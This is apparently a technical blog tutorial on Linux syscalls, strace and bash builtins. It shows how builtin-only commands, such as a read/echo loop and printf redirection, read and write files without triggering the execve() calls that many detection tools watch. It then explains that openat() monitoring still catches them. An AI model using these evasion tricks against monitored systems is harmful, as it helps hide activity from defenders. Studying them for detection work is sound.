Generally, security tools watch for the execve() syscall, which indicates that a new program is being executed (there are others of a similar nature, such as execveat(), clone(), and fork()). This is a safer thing to watch from a resource perspective, as it doesn’t take place as often as some of the other syscalls, and it’s also where most of the interesting activity is taking place. Many of the EDR-like tools watch this syscall specifically. As we’ll see here shortly, this is not always the best approach.
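
To see why execve() is such a popular thing to watch, we can trace just the exec-family syscalls while running a command through a shell; each external program launched shows up as exactly one execve(). A quick sketch:

# Follow child processes (-f) and show only the exec-family syscalls
$ strace -f -e trace=execve,execveat bash -c 'ls /tmp'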

There aren’t any bad syscalls we can watch, they’re all just tools. Syscalls don’t hack systems, people with syscalls hack systems. There are many syscalls to watch and a lot of different ways they can be used. On Linux, one of the common methods of interfacing with the OS is through system shells, such as bash and zsh. 

NOTE: If you want to see a complete* list of syscalls, take a gander at the syscalls man page. This list also shows where syscalls are specific to certain architectures or have been deprecated. *for certain values of complete

Examining Syscalls

Now that we have some ideas of what syscalls are, let’s take a quick look at some of them in action. On Linux, one of the primary tools for examining syscalls as they happen is strace. There are a few other tools we can use for this (including the open source version of Sysdig), which we will discuss at greater length in future articles. The strace utility allows us to snoop on syscalls as they’re taking place, which is exactly what we want when we’re trying to get a better view of what exactly is happening when a command executes. Let’s try this out:

1 – We’re going to make a new directory to perform our test in, then use touch to make a file in it. This will help minimize what we get back from strace, but it will still return quite a bit.

5 – Then, we’ll run strace and ask it to execute the ls command. Bear in mind that this is the output of a very small and strictly bounded test where we aren’t doing much. With a more complex set of commands, we would see many, many more syscalls. 

7 – Here, we can see the execve() syscall and the ls command being executed. This particular syscall is often the one monitored for by various detection tools as it indicates program execution. Note that there are a lot of other syscalls happening in our example, but only one execve()

8 – From here on down, we can see a variety of syscalls taking place in order to support the ls command being executed. We won’t dig too deeply into the output here, but we can see various libraries being used, address space being mapped, bytes being read and written, etc.

$ mkdir test
$ cd test/
$ touch testfile

$ strace ls

execve("/usr/bin/ls", ["ls"], 0x7ffcb7920d30 /* 54 vars */) = 0
brk(NULL)                               = 0x5650f69b7000
arch_prctl(0x3001 /* ARCH_??? */, 0x7fff2e5ae540) = -1 EINVAL (Invalid argument)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f07f9f63000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=61191, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 61191, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f07f9f54000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libselinux.so.1", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=166280, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 177672, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f07f9f28000
mprotect(0x7f07f9f2e000, 139264, PROT_NONE) = 0
mmap(0x7f07f9f2e000, 106496, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6000) = 0x7f07f9f2e000
mmap(0x7f07f9f48000, 28672, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x20000) = 0x7f07f9f48000
mmap(0x7f07f9f50000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x27000) = 0x7f07f9f50000
mmap(0x7f07f9f52000, 5640, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f07f9f52000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P\237\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0 \0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0"..., 48, 848) = 48
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0 =\340\2563\265?\356\25x\261\27\313A#\350"..., 68, 896) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=2216304, ...}, AT_EMPTY_PATH) = 0
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 2260560, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f07f9c00000
mmap(0x7f07f9c28000, 1658880, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x28000) = 0x7f07f9c28000
mmap(0x7f07f9dbd000, 360448, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1bd000) = 0x7f07f9dbd000
mmap(0x7f07f9e15000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x214000) = 0x7f07f9e15000
mmap(0x7f07f9e1b000, 52816, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f07f9e1b000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpcre2-8.so.0", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=613064, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 615184, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f07f9e91000
mmap(0x7f07f9e93000, 438272, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f07f9e93000
mmap(0x7f07f9efe000, 163840, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6d000) = 0x7f07f9efe000
mmap(0x7f07f9f26000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x94000) = 0x7f07f9f26000
close(3)                                = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f07f9e8e000
arch_prctl(ARCH_SET_FS, 0x7f07f9e8e800) = 0
set_tid_address(0x7f07f9e8ead0)         = 877628
set_robust_list(0x7f07f9e8eae0, 24)     = 0
rseq(0x7f07f9e8f1a0, 0x20, 0, 0x53053053) = 0
mprotect(0x7f07f9e15000, 16384, PROT_READ) = 0
mprotect(0x7f07f9f26000, 4096, PROT_READ) = 0
mprotect(0x7f07f9f50000, 4096, PROT_READ) = 0
mprotect(0x5650f62f3000, 4096, PROT_READ) = 0
mprotect(0x7f07f9f9d000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7f07f9f54000, 61191)           = 0
statfs("/sys/fs/selinux", 0x7fff2e5ae580) = -1 ENOENT (No such file or directory)
statfs("/selinux", 0x7fff2e5ae580)      = -1 ENOENT (No such file or directory)
getrandom("\x9a\x10\x6f\x3b\x21\xc0\xe9\x56", 8, GRND_NONBLOCK) = 8
brk(NULL)                               = 0x5650f69b7000
brk(0x5650f69d8000)                     = 0x5650f69d8000
openat(AT_FDCWD, "/proc/filesystems", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0444, st_size=0, ...}, AT_EMPTY_PATH) = 0
read(3, "nodev\tsysfs\nnodev\ttmpfs\nnodev\tbd"..., 1024) = 421
read(3, "", 1024)                       = 0
close(3)                                = 0
access("/etc/selinux/config", F_OK)     = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=5712208, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 5712208, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f07f9600000
close(3)                                = 0
ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0
ioctl(1, TIOCGWINSZ, {ws_row=48, ws_col=143, ws_xpixel=0, ws_ypixel=0}) = 0
openat(AT_FDCWD, ".", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
newfstatat(3, "", {st_mode=S_IFDIR|0775, st_size=4096, ...}, AT_EMPTY_PATH) = 0
getdents64(3, 0x5650f69bd9f0 /* 3 entries */, 32768) = 80
getdents64(3, 0x5650f69bd9f0 /* 0 entries */, 32768) = 0
close(3)                                = 0
newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}, AT_EMPTY_PATH) = 0
write(1, "testfile\n", 9testfile
)               = 9
close(1)                                = 0
close(2)                                = 0
exit_group(0)                           = ?
+++ exited with 0 +++


Strace has a considerably larger set of capabilities than what we touched on here. A good starting place for digging into it further can be found in the documentation.

Now that we’ve covered syscalls, let’s talk a bit about system shells. 

Linux System Shell 101

System shells are interfaces that allow us to interact with an operating system. While shells can be graphical in nature, most of the time when we hear the word shell, it will be in reference to a command-line shell accessed through a terminal application. The shell interprets commands from the user and passes them on to the kernel via, you guessed it, syscalls. We can use the shell to interact with the resources we discussed earlier as being available via syscalls, such as networks, files, and hardware components.

On any given Linux installation, there will be one or more shells installed. On a typical server or desktop installation, we’ll likely find a small handful of them installed by default. On a purposefully stripped-down distribution, such as those used for containers, there may only be one. 

On most distributions, we can easily ask about the shell environment that we are operating in: 

1 – Reading /etc/shells should get us a list of which shells are installed on the system. Here we can see sh, bash, rbash, dash, and zsh as available shells. 

NOTE: The contents of /etc/shells aren’t, in all cases, the complete list of shells on the system. It’s a list of which ones can be used as login shells. The two are generally the same list, but YMMV.

15 – We can easily check which shell we’re currently using by executing echo $0. In this case, we’re running the bash shell.

19 – Switching to another shell is simple enough. We can see that zsh is present in our list of shells and we can change to it by simply issuing zsh from our current shell. 

21 – Once in zsh, we’ll ask which shell we are in again, and we can see it is now zsh.

25 – We’ll then exit zsh, which will land us back in our previous shell. If we check which shell we’re in again, we can see it is bash once again. 

$ cat /etc/shells

# /etc/shells: valid login shells
/bin/sh
/bin/bash
/usr/bin/bash
/bin/rbash
/usr/bin/rbash
/usr/bin/sh
/bin/dash
/usr/bin/dash
/bin/zsh
/usr/bin/zsh

$ echo $0

/bin/bash

$ zsh

% echo $0

zsh

% exit

$ echo $0

/bin/bash

As we walk through the rest of our discussion, we’ll be focusing on the bash shell. The various shells have somewhat differing functionality, but are usually similar, at least in broad strokes. Bash stands for “Bourne Again SHell,” as it was designed as a replacement for the original Bourne shell. We’ll often find the Bourne shell on many systems also; it’s in the list we looked at above at /bin/sh.

All this is great, you might say, but we were promised syscall evasion. Hold tight, we have one more background bit to cover, then we’ll talk about those parts. 

Shell Builtins vs. External Binaries

When we execute a command in a shell, it can fall into one of several categories:

  • It can be a program binary external to our shell (we’ll call it a binary for short). 
  • It can be an alias, which is a sort of macro pointing to another command or commands. 
  • It can be a function, which is a user-defined script or sequence of commands. 
  • It can be a keyword, a common example of which would be something like ‘if’, which we might use when writing a script. 
  • It can be a shell builtin, which is, as we might expect, a command built into the shell itself.

We’ll focus primarily on binaries and builtins here; the quick sketch below shows how bash classifies each of these categories.
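
The type builtin with its -t switch prints a single word telling us which category bash resolves a name to. Here’s a minimal sketch; ll and greet are hypothetical names we define on the spot, and we’re assuming cat isn’t aliased on your system:

$ alias ll='ls -l'          # define an alias
$ greet() { echo hi; }      # define a function
$ type -t ll greet if cd cat
alias
function
keyword
builtin
file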

Identifying External Binaries

Let’s take another look at the ls command:

1 – We can use the which command to see the location of the command being executed when we run ls. We’ll use the -a switch so it will return all of the results. We can see there are a couple of results, but this doesn’t tell us what ls is, just where it is.

6 – To get a better idea of what is on the other end of ls when we run it, we can use the type command. Again, we’ll add the -a switch to get all the results. Here, we can see that there is one alias and two files in the filesystem behind the ls command.

7 – First, the alias will be evaluated. This particular alias adds the switch to colorize the output of ls when we execute it. 

8 – After this, there are two ls binaries in the filesystem. Which of these is executed depends on the order of our path. 

11 – If we take a look at the path, we can see that /usr/bin appears in the path before /bin, so /usr/bin/ls is the command being executed by the ls alias when we type ls into our shell. The final piece of information we need to know here is what type of command this particular ls is.

15 – We can use the file command to dig into ls. File tells us that this particular version of ls is a 64-bit ELF binary. Circling all the way back around to our discussion on types of commands, this makes ls an external binary.

21 – Incidentally, if we look at the other ls located in /bin, we will find that it is an identical file with an identical hash. What is this sorcery? If we use file to interrogate /bin, we’ll see that it’s a symlink to usr/bin. We’re seeing the ls binary twice, but there is really only one copy of the file.

$ which -a ls
/usr/bin/ls
/bin/ls


$ type -a ls
ls is aliased to `ls --color=auto'
ls is /usr/bin/ls
ls is /bin/ls

$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/sna
p/bin:/snap/bin

$ file /usr/bin/ls
/usr/bin/ls: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically
 linked, interpreter /lib64/ld-linux-x86-64.so.2,
 BuildID[sha1]=897f49cafa98c11d63e619e7e40352f855249c13, for GNU/Linux 3.2.0,
 stripped

$ file /bin
/bin: symbolic link to usr/bin
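
If you want to verify the “identical file with an identical hash” claim for yourself, hashing both paths makes the point, since both names resolve to the same file through the symlink:

# Both lines will print the same digest
$ sha256sum /usr/bin/ls /bin/ls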

Identifying Shell Builtins

We briefly mentioned that a shell builtin is built into the binary of the shell itself. The builtins available for any given shell can vary quite widely. Let’s take a quick look at what we have available in bash:

1 – The compgen command is one of those esoteric command line kung-fu bits. In this case, we’ll use it with the -b switch, which effectively says “show me all the shell builtins.” We’ll also do a little formatting to show the output in columns and then show a count of the results.

2 – We can see some common commands in the output, like cd, echo, and pwd (also note the compgen command we just ran). When we execute these, we don’t reach out to any other binaries inside the filesystem, we do it all inside of the bash shell already running. 

17 – We should also note that just because one of these commands is in the builtins list for our shell, it can also be elsewhere. If we use the type command again to inquire about echo, which is in our builtins list, type will tell us it is a shell builtin, but we will also see a binary sitting in the filesystem. If we run echo from bash, we will get the builtin, but if we run it from another shell without a builtin echo, we may get the one from the filesystem instead. 

$ compgen -b | pr -5 -t; echo "Count: $(compgen -b | wc -l)"
.          compopt    fc          popd        suspend
:          continue   fg          printf      test
[          declare    getopts     pushd       times
alias      dirs       hash        pwd         trap
bg         disown     help        read        true
bind       echo       history     readarray   type
break      enable     jobs        readonly    typeset
builtin    eval       kill        return      ulimit
caller     exec       let         set         umask
cd         exit       local       shift       unalias
command    export     logout      shopt       unset
compgen    false      mapfile     source      wait
complete
Count: 61

$ type -a echo
echo is a shell builtin
echo is /usr/bin/echo
echo is /bin/echo


It's also important to note that this set of builtins is specific to the bash shell; other shells may be very different. Let's take a quick look at the builtins for zsh.

1 – Zsh doesn't have compgen, so we'll need to get the data we want in a different manner. We'll access the builtins associative array, which contains all the builtin commands of zsh, then do some formatting to put the output into columns and make the results a bit more readable, lastly getting a count of the results.

% print -roC5 -- ${(k)builtins}; echo "Count: ${(k)#builtins}"

-              compquote   fg         pushln    umask
.              compset     float      pwd       unalias
:              comptags    functions  r         unfunction
[              comptry     getln      read      unhash
alias          compvalues  getopts    readonly  unlimit
autoload       continue    hash       rehash    unset
bg             declare     history    return    unsetopt
bindkey        dirs        integer    sched     vared
break          disable     jobs       set       wait
builtin        disown      kill       setopt    whence
bye            echo        let        shift     where
cd             echotc      limit      source    which
chdir          echoti      local      suspend   zcompile
command        emulate     log        test      zf_ln
compadd        enable      logout     times     zformat
comparguments  eval        noglob     trap      zle
compcall       exec        popd       true      zmodload
compctl        exit        print      ttyctl    zparseopts
compdescribe   export      printf     type      zregexparse
compfiles      false       private    typeset   zstat
compgroups     fc          pushd      ulimit    zstyle
Count: 105
NOTE:
Print what now? The command print -roC5 -- ${(k)builtins}; echo "Count: ${(k)#builtins}" can be a bit difficult to parse. Here's a breakdown of what each part does:
%: This indicates that we're (probably) in the Zsh shell.
print: This is a command in Zsh used to display text.
-roC5: These are options for the print command.
-r: Don't treat backslashes as escape characters.
-o: Sort the printed list in alphabetical order.
C5: Format the output into 5 columns.
--: This signifies the end of the options for the command. Anything after this is treated as an argument, not an option.
${(k)builtins}: This is a parameter expansion in Zsh.
${...}: Parameter expansion syntax in Zsh.
(k): A flag to list the keys of an associative array.
builtins: Refers to an associative array in Zsh that contains all built-in commands.
echo "Count: ${(k)#builtins}": This part of the command prints the count of built-in commands.
echo: A command to display the following text.
"Count: ": The text to be displayed.
${(k)#builtins}: Counts the number of keys in the builtins associative array, which in this context means counting all built-in commands in Zsh.
In simple terms, this command lists all the built-in commands available in the Zsh shell, formats them into five columns, and then displays the total count of these commands.

We can see here that there are over 40 more builtins in zsh than there are in bash. Many of them are the same as what we see in bash, but the availability of builtin commands is something to validate when working with different shells. We’ll continue working with bash as it’s one of the more commonly used shells that we might encounter, but this is certainly worth bearing in mind. 
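
For example, we can ask each shell directly how it classifies a given command. On a typical Linux system, bash has no which builtin, while zsh does (a quick sketch; exact output will vary by version and distribution):

$ bash -c 'type which'
which is /usr/bin/which
$ zsh -c 'whence -w which'
which: builtin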

Now that we know a bit about the shell and shell builtins, let’s look at how we can use these for syscall evasion.

Syscall Evasion Techniques Using Bash Builtins

As we mentioned earlier, many security tools that monitor syscalls monitor for process execution via the execve() syscall. From a certain tool design perspective, this is a great solution as it limits the number of syscalls we need to watch and should catch most of the interesting things going on. For example, let’s use cat to read out the contents of a file and watch what happens with strace:

1 – First, we’ll echo a bit of data into the test file we used earlier so we have something to play with. Then, we’ll cat the file and we can see the output with the file contents.

5 – Now let’s do this again, but this time we’ll watch what happens with strace. We’ll spin up a new bash shell which we will monitor with strace. This time, we’ll also add the -f switch so strace will monitor subprocesses as well. This will result in a bit of extra noise in the output, but we need this in order to get a better view of what is happening as we’re operating in a new shell. Note that strace is now specifying the pid (process id) at the beginning of each syscall as we’re watching multiple processes.

6 – Here we have the execve() syscall taking place for the bash shell we just started. We can see the different subprocesses taking place as bash starts up.

34 – Now we’re dropped back to a prompt, but still operating inside the shell being monitored with strace. Let’s cat the file again and watch the output. 

37 – We can see the syscall for our cat here, along with the results of the command. This is all great, right? We were able to monitor the command with strace and see its execution. We saw the exact command we ran and the output of the command. 

$ echo supersecretdata >> testfile
$ cat testfile 
supersecretdata

$ strace -f -e trace=execve bash
execve("/usr/bin/bash", ["bash"], 0x7ffee6b6c710 /* 54 vars */) = 0
strace: Process 884939 attached
[pid 884939] execve("/usr/bin/lesspipe", ["lesspipe"], 0x55aa1d8a3090 /* 54 vars */) = 0
strace: Process 884940 attached
[pid 884940] execve("/usr/bin/basename", ["basename", "/usr/bin/lesspipe"],
0x55983907af68 /* 54 vars */) = 0
[pid 884940] +++ exited with 0 +++
[pid 884939] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
 si_pid=884940, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 884941 attached
strace: Process 884942 attached
[pid 884942] execve("/usr/bin/dirname", ["dirname", "/usr/bin/lesspipe"],
0x559839087108 /* 54 vars */) = 0
[pid 884942] +++ exited with 0 +++
[pid 884941] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884942, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 884941] +++ exited with 0 +++
[pid 884939] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884941, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 884939] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884939,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 884943 attached
[pid 884943] execve("/usr/bin/dircolors", ["dircolors", "-b"], 0x55aa1d8a2d10 /* 54 vars
*/) = 0
[pid 884943] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884943,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
$ cat testfile

strace: Process 884946 attached
[pid 884946] execve("/usr/bin/cat", ["cat", "testfile"], 0x55aa1d8a9520 /* 54 vars */) = 0
supersecretdata
[pid 884946] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884946,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---

$ exit
exit
+++ exited with 0 +++


Let’s try being sneakier about things by using a little shell scripting of a bash builtin and see what the results are: 

1 – We’ll start a new bash shell and watch it with strace, the same as we did previously.

3 – Here’s the execve() syscall for the bash shell, just as we expected.

31 – And we’re dropped back to the prompt. This time, instead of using cat, we’ll use two of the bash builtins to frankenstein a command together and replicate what cat does:

while IFS= read -r line; do echo "$line"; done < testfile

This uses the bash builtins read and echo to process our file line by line. We use read to fetch each line from testfile into the variable line, with the -r switch to ensure any backslashes are read literally. Setting IFS= (the internal field separator) to empty preserves leading and trailing whitespace. Then, echo outputs each line exactly as it's read.

35 – Zounds! We’re dropped back to the prompt with no output from strace at all.

$ strace -f -e trace=execve bash

execve("/usr/bin/bash", ["bash"], 0x7fff866fefc0 /* 54 vars */) = 0
strace: Process 884993 attached
[pid 884993] execve("/usr/bin/lesspipe", ["lesspipe"], 0x5620a56bf090 /* 54 vars */) = 0
strace: Process 884994 attached
[pid 884994] execve("/usr/bin/basename", ["basename", "/usr/bin/lesspipe"],
0x558950f6cf68 /* 54 vars */) = 0
[pid 884994] +++ exited with 0 +++
[pid 884993] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=884994, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 884995 attached
strace: Process 884996 attached
[pid 884996] execve("/usr/bin/dirname", ["dirname", "/usr/bin/lesspipe"],
0x558950f79108 /* 54 vars */) = 0
[pid 884996] +++ exited with 0 +++
[pid 884995] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=884996, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 884995] +++ exited with 0 +++
[pid 884993] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=884995, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 884993] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884993,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 884997 attached
[pid 884997] execve("/usr/bin/dircolors", ["dircolors", "-b"], 0x5620a56bed10 /* 54 vars
*/) = 0
[pid 884997] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884997,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
$ while IFS= read -r line; do echo "$line"; done < testfile

supersecretdata

$ 
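
The same trick works in the other direction, too. Since printf is also a bash builtin and redirections are handled by the shell itself, we can write a file without triggering execve() either; the only trace is the open of the target file (a minimal sketch, with an arbitrary path):

$ printf 'payload\n' > /tmp/dropped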

If we can’t see the activity while monitoring for process execution, how do we find it?

Looking for Syscalls in All the Right Places

The problem we were encountering with not seeing the sneaky bash builtin activity was largely due to looking in the wrong place. We couldn't see anything happening with execve() because there was nothing to see. In this particular case, we know a file is being opened, so let's try one of the open syscalls. We're going to cheat a bit and jump directly to looking at openat(), but it could very well be any of the open syscalls we discussed earlier. 

1 – We’ll start up the strace-monitored bash shell again. This time, our filter is based on openat() instead of execve().

2 – Note that we see a pretty different view of what is taking place when bash starts up this time since we’re watching for files being opened. 

72 – Back at the prompt, we’ll run our sneaky bit of bash script to read the file. 

73 – Et voilà, we see the openat() syscall for our file being opened and the resulting output. 

$ strace -f -e trace=openat bash
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libtinfo.so.6", O_RDONLY|O_CLOEXEC) =
3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/dev/tty", O_RDWR|O_NONBLOCK) = 3
openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache",
O_RDONLY) = 3
openat(AT_FDCWD, "/etc/nsswitch.conf", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/terminfo/x/xterm-256color", O_RDONLY) = 3
openat(AT_FDCWD, "/etc/bash.bashrc", O_RDONLY) = 3
openat(AT_FDCWD, "/home/user/.bashrc", O_RDONLY) = 3
openat(AT_FDCWD, "/home/user/.bash_history", O_RDONLY) = 3
strace: Process 984240 attached
[pid 984240] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 984240] openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6",
O_RDONLY|O_CLOEXEC) = 3
[pid 984240] openat(AT_FDCWD, "/usr/bin/lesspipe", O_RDONLY) = 3
strace: Process 984241 attached
[pid 984241] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 984241] openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6",
O_RDONLY|O_CLOEXEC) = 3
[pid 984241] openat(AT_FDCWD, "/usr/lib/locale/locale-archive",
O_RDONLY|O_CLOEXEC) = 3
[pid 984241] +++ exited with 0 +++
[pid 984240] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=984241, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 984242 attached
strace: Process 984243 attached
[pid 984243] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 984243] openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6",
O_RDONLY|O_CLOEXEC) = 3
[pid 984243] openat(AT_FDCWD, "/usr/lib/locale/locale-archive",
O_RDONLY|O_CLOEXEC) = 3
[pid 984243] +++ exited with 0 +++
[pid 984242] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=984243, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 984242] +++ exited with 0 +++
[pid 984240] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=984242, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 984240] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=984240,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 984244 attached
[pid 984244] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 984244] openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6",
O_RDONLY|O_CLOEXEC) = 3
[pid 984244] openat(AT_FDCWD, "/usr/lib/locale/locale-archive",
O_RDONLY|O_CLOEXEC) = 3
[pid 984244] openat(AT_FDCWD,
"/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
[pid 984244] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=984244,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
openat(AT_FDCWD, "/usr/share/bash-completion/bash_completion", O_RDONLY) = 3
openat(AT_FDCWD, "/etc/init.d/",
O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
openat(AT_FDCWD, "/etc/bash_completion.d/",
O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
openat(AT_FDCWD, "/etc/bash_completion.d/apport_completion", O_RDONLY) = 3
openat(AT_FDCWD, "/etc/bash_completion.d/git-prompt", O_RDONLY) = 3
openat(AT_FDCWD, "/usr/lib/git-core/git-sh-prompt", O_RDONLY) = 3
openat(AT_FDCWD, "/dev/null", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3
openat(AT_FDCWD, "/home/user/.bash_history", O_RDONLY) = 3
openat(AT_FDCWD, "/home/user/.bash_history", O_RDONLY) = 3
openat(AT_FDCWD, "/home/user/.inputrc", O_RDONLY) = -1 ENOENT (No such file or
directory)
openat(AT_FDCWD, "/etc/inputrc", O_RDONLY) = 3

$ while IFS= read -r line; do echo "$line"; done < testfile
openat(AT_FDCWD, "testfile", O_RDONLY)  = 3
supersecretdata

We can catch the activity from the shell builtins, in most cases, but it’s a matter of looking in the right places for the activity we want. It might be tempting to think we could just watch all the syscalls all the time, but doing so quickly becomes untenable. Our example above produces somewhere around 50 lines of strace output when we are filtering just for openat(). If we take the filtering off entirely and watch for all syscalls, it balloons out to 1,200 lines of output. 

